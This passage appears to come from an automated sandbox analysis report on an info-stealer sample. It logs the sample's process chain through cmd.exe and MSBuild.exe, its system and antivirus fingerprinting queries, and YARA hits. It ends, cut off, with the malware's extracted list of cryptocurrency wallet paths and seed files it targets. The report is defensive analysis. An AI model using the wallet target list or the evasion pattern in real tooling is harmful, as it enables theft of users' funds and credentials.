                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042086B
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_004170F1
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_004201F6
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_004201AB
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_00420291
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042031E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_004174E4
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_0042056E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00420697
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0041FF33
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_0042079E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_05B804F8
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_05B80412
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_05B8045D
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_05B807D3
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_05B807D5
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_05B7774B
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_05B8019A
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_05B808FE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: EnumSystemLocalesW,0_2_05B77358
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_05B80AD2
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: GetLocaleInfoW,0_2_05B80A05
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00414570
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5ek.1.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_004143C0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_004144B0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001E2DA6 _memset,GetVersionExW,2_2_001E2DA6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED
                          Source: Yara matchFile source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx 